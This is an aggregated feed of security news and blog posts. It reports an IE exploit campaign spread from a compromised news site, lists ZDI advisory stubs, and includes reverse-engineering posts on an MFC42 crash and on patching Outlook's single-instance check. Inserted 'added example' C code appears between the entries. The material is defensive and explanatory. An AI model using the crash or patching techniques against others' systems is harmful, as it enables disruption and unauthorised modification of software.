==> Possible Root Compromise of Greatandhra.com

http://blog.scansafe.com/journal/rss.xml A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339. The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018). Successful exploitation leads to the silent installation of a data-theft trojan delivered from n9uo.com. Both attack domains, v3p2.com and n9uo.com, were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website. Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline: Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained. First encounters resulting from these attacks began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

==> Secure Awareness mottoes and one-liners

http://blogs.securiteam.com/index.php/feed/ From various forums, mailing lists, discussions and other sources (many of which exist only in my febrile imagination), herewith a bit of a compilation of mottoes that can be used as part of a security awareness campaign: No-one in Africa wants to GIVE anyone their money or gold. Microsoft/Google/a Russian oil magnate/VW/BMW/etc certainly does not [...]

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)...are installed on the system where you are performing a penetration test, isn't it? I have decided to put up for sale, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Microsoft joins Apple, Facebook, and Twitter; comes out as hack victim

http://feeds.arstechnica.com/arstechnica/security?format=xml Machines in the Mac Business Unit were compromised.

==> ZDI-CAN-1788: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1786: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1778: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1754: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1771: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1770: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1769: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1753: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1783: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1720: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 18 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1709: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 18 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1694: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-04, 18 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1755: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1695: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1721: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Simon Zuckerbraun' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1677: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1673: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1675: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'c1d2d9acc746ae45eeb477b97fa74688' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1592: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'FuzzMyApp' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1691: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-20, 94 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1604: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will

==> ZDI-CAN-1602: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1651: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-08, 106 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1648: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-30, 115 days ago. The vendor is given until 2013-04-28 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1649: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 121 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a
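Each ZDI entry above prints a CVSS v2 base score next to its vector string. The following is an added example (not ZDI's code) that recomputes a base score from such a vector with the CVSS v2 base-score equations, so a reader can check that a listed score agrees with its vector; the vector/score pairs in main() are copied from the entries above.

```c
#include <stdio.h>
#include <string.h>

/* Weight of one CVSS v2 base metric value, or -1.0 for an unknown value. */
static double cvss2_weight(const char *metric, char value) {
    if (strcmp(metric, "AV") == 0)            /* Access Vector */
        return value == 'L' ? 0.395 : value == 'A' ? 0.646 : value == 'N' ? 1.0 : -1.0;
    if (strcmp(metric, "AC") == 0)            /* Access Complexity */
        return value == 'H' ? 0.35 : value == 'M' ? 0.61 : value == 'L' ? 0.71 : -1.0;
    if (strcmp(metric, "Au") == 0)            /* Authentication */
        return value == 'M' ? 0.45 : value == 'S' ? 0.56 : value == 'N' ? 0.704 : -1.0;
    /* C, I and A share one impact scale */
    return value == 'N' ? 0.0 : value == 'P' ? 0.275 : value == 'C' ? 0.660 : -1.0;
}

/* Parse "AV:x/AC:x/Au:x/C:x/I:x/A:x" (the order the entries use) into six weights.
   Returns 0 on success, -1 if the vector is malformed or has an unknown value. */
static int cvss2_parse(const char *vec, double w[6]) {
    static const char *names[6] = {"AV", "AC", "Au", "C", "I", "A"};
    const char *p = vec;
    for (int i = 0; i < 6; i++) {
        size_t n = strlen(names[i]);
        if (strncmp(p, names[i], n) != 0 || p[n] != ':') return -1;
        w[i] = cvss2_weight(names[i], p[n + 1]);
        if (w[i] < 0.0) return -1;
        p += n + 2;
        if (i < 5) {
            if (*p != '/') return -1;
            p++;
        }
    }
    return *p == '\0' ? 0 : -1;
}

/* CVSS v2 base score in tenths (68 means 6.8), or -1 for a bad vector.
   Integer tenths avoid floating-point surprises when comparing with a listed score. */
int cvss2_base_tenths(const char *vec) {
    double w[6];
    if (cvss2_parse(vec, w) != 0) return -1;
    double impact = 10.41 * (1.0 - (1.0 - w[3]) * (1.0 - w[4]) * (1.0 - w[5]));
    double exploitability = 20.0 * w[0] * w[1] * w[2];
    double f_impact = (impact == 0.0) ? 0.0 : 1.176;
    double raw = (0.6 * impact + 0.4 * exploitability - 1.5) * f_impact;
    return (int)(raw * 10.0 + 0.5);          /* round half up to one decimal */
}

/* 1 if the score computed from the vector equals the score printed beside it. */
int cvss2_matches_listed(const char *vec, int listed_tenths) {
    return cvss2_base_tenths(vec) == listed_tenths;
}

int main(void) {
    /* Vector/score pairs as they appear in the ZDI entries above. */
    struct { const char *vec; int tenths; } listed[] = {
        {"AV:N/AC:M/Au:N/C:P/I:P/A:P", 68},
        {"AV:N/AC:L/Au:N/C:P/I:P/A:P", 75},
        {"AV:N/AC:M/Au:N/C:N/I:N/A:C", 71},
        {"AV:N/AC:H/Au:N/C:P/I:P/A:P", 51},
        {"AV:N/AC:M/Au:N/C:C/I:C/A:C", 93},
        {"AV:N/AC:L/Au:N/C:P/I:P/A:C", 90},
    };
    for (size_t i = 0; i < sizeof listed / sizeof listed[0]; i++) {
        int t = cvss2_base_tenths(listed[i].vec);
        printf("%s -> %d.%d (listed %d.%d) %s\n", listed[i].vec, t / 10, t % 10,
               listed[i].tenths / 10, listed[i].tenths % 10,
               cvss2_matches_listed(listed[i].vec, listed[i].tenths) ? "ok" : "MISMATCH");
    }
    return 0;
}
```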

==> Attention shoppers: Patch IE now before you shop online

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Today is the eleventh Patch Tuesday of 2012, but the first since the official launch of Windows 8 and Windows RT. There are six new security bulletins, a couple of which are particularly urgent, especially for anyone planning to do any online shopping this holiday season. There are four security bulletins rated as Critical, one Important, and one Moderate. The Critical security bulletins address issues with Internet Explorer, Windows kernel-mode drivers, the .NET framework, and flaws in Windows shell code that can allow remote exploits. The most crucial of the six security bulletins is the cumulative update for Internet Explorer, MS12-071. Andrew Storms, director of security operations for nCircle, declares, "Topping our patch immediately list this month is the drive-by exploit affecting Internet Explorer 9. It's fairly obvious that Microsoft patched this bug in IE10 before its release; otherwise, we would have a bulletin affecting both IE9 and IE10."

==> Patch Tuesday: Five critical bulletins, Exchange Server fix expected

http://feeds.pheedo.com/tt/1323 In addition to Exchange Server, updates fix flaws in Internet Explorer, Microsoft Office and Microsoft Word.

==> Flame Windows Update Attack Could Have Been Repeated in 3 Days, Says Microsoft

http://feeds.wired.com/wired27b When the sophisticated state-sponsored espionage tool known as Flame was exposed last year, no one was more concerned about the discovery than Microsoft, after realizing that the tool was signed with a modified

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday, while some of us in the USA were enjoying a day off, Google made the news with this article in the Financial Times stating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches [...]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL:

    MOV EBX,104
    PUSH EBX
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH EAX
    PUSH DWORD PTR DS:[ESI+6C]
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH 2E
    PUSH EAX
    CALL DWORD PTR DS:[<&msvcrt._mbsrchr>]
    POP ECX
    POP ECX
    MOV DWORD PTR SS:[EBP-80],EAX
    MOV BYTE PTR DS:[EAX],0          <-- Crash!

The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following:

    GetModuleFileName(NULL, szBuffer, MAX_PATH);
    *(_mbsrchr(szBuffer, '.')) = 0;

The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the second line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of; however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! As surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists!

Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold:

    PUSH 104
    LEA EDX,DWORD PTR SS:[EBP+szBuffer]
    MOV [EDI+0C],ECX
    MOV EAX,DWORD PTR DS:[ESI+6C]
    PUSH EDX
    PUSH EAX
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    TEST EAX,EAX
    JZ LOC_722F1484
    CMP EAX,104
    JZ LOC_722F1484
    LEA ECX,[EBP+szBuffer]
    PUSH 2E
    PUSH ECX
    CALL __mbsrchr
    MOV EBX,EAX
    ADD ESP,8
    TEST EBX,EBX
    MOV [EBP+VAR_310],EBX
    JZ LOC_7230DB7D
    ...

    __mbsrchr:
    MOV EDI,EDI
    PUSH EBP
    MOV EBP,ESP
    POP EBP
    JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]

    LOC_7230DB7D:
    ...
    JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>]

While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista:

    C:\>copy c:\windows\notepad.exe notepad_exe
            1 file(s) copied.

    C:\>notepad_exe
    'notepad_exe' is not recognized as an internal or external command,
    operable program or batch file.

    C:\>start notepad_exe
    [This opens the "Open With" dialog box in Explorer instead of executing the file.]

However, it is still possible to run non-dotted files via API functions like CreateProcess(...) to cause the crash described above.
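The two-line C equivalent in the post writes through _mbsrchr()'s result without checking it. As an added example (mine, not MFC's code), here is a portable rendering of that logic with strrchr() standing in for _mbsrchr(), beside a hardened version that reports a missing '.' instead of dereferencing NULL; the hardened version also assumes, going beyond the post, that a '.' inside a directory component (such as "app.d\tool") is not the file's extension.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Portable rendering of the MFC42 logic quoted above, using strrchr() in place
   of _mbsrchr(): the search result is written through unchecked, so a file name
   with no '.' becomes a write to address 0, which is the crash described. */
void strip_extension_unchecked(char *path) {
    *strrchr(path, '.') = '\0';   /* NULL dereference when '.' is absent */
}

/* Hardened version.  Returns 1 if an extension was removed, 0 if the final
   path component has no extension; the buffer is left untouched in that case.
   Assumption (added here, not in the MFC code): only the part after the last
   path separator is examined, so a '.' in a directory name is ignored, and a
   leading '.' (a dotfile such as ".bashrc") is not treated as an extension. */
int strip_extension(char *path) {
    if (path == NULL) return 0;
    const char *base = path;                       /* start of the final component */
    for (const char *p = path; *p != '\0'; p++)
        if (*p == '\\' || *p == '/') base = p + 1;
    char *dot = strrchr(base, '.');
    if (dot == NULL || dot == base) return 0;      /* no '.', or a dotfile */
    *dot = '\0';
    return 1;
}

int main(void) {
    /* Constructed inputs mirroring the post's notepad.exe / notepad_exe experiment. */
    char dotted[] = "C:\\windows\\notepad.exe";
    char undotted[] = "C:\\windows\\notepad_exe";
    strip_extension(dotted);
    printf("%s\n", dotted);                        /* C:\windows\notepad */
    if (!strip_extension(undotted))
        printf("%s: no extension to strip (the MFC42 code would crash here)\n", undotted);
    return 0;
}
```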

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitoring each process for termination, then deleting the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself. 
I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows: A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent:

    * TB_BUTTONCOUNT
    * TB_GETBUTTONINFOW
    * TB_SETBUTTONINFOW
    * WM_PAINT
    * WM_ERASEBKGND

The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages:

    <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024
    <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT
    <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE
    <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False
    <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0
    <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18
    <00007> 00010056 R TB_HITTEST iIndex:0
    <00008> 00010056 S TB_DELETEBUTTON iButton:0
    <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True

Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE.
With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area:

    #include <windows.h>

    // First child window of x with class name y (and an empty window title)
    #define FW(x,y) FindWindowEx(x, NULL, y, L"")

    void RefreshTaskbarNotificationArea()
    {
        HWND hNotificationArea;
        RECT r;

        // Walk Shell_TrayWnd -> TrayNotifyWnd -> SysPager -> ToolbarWindow32 "Notification Area"
        GetClientRect(
            hNotificationArea = FindWindowEx(
                FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"),
                NULL,
                L"ToolbarWindow32",
                L"Notification Area"),
            &r);

        // Sweep a synthetic mouse move over the client area in 5-pixel steps;
        // the toolbar deletes any button whose owning process is gone.
        for (LONG x = 0; x < r.right; x += 5)
            for (LONG y = 0; y < r.bottom; y += 5)
                SendMessage(hNotificationArea, WM_MOUSEMOVE, 0, (y << 16) + x);
    }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. 
My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make-do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running. 
The great thing about this approach is that it's incredibly straightforward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code:

    .text:30006BB7 push    offset WindowName     ; "Microsoft Outlook"
    .text:30006BBC push    offset aMspim_wnd32   ; "mspim_wnd32"
    .text:30006BC1 mov     [ebp+var_42C], edi
    .text:30006BC7 call    ds:FindWindowA

This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straightforward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions.
As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

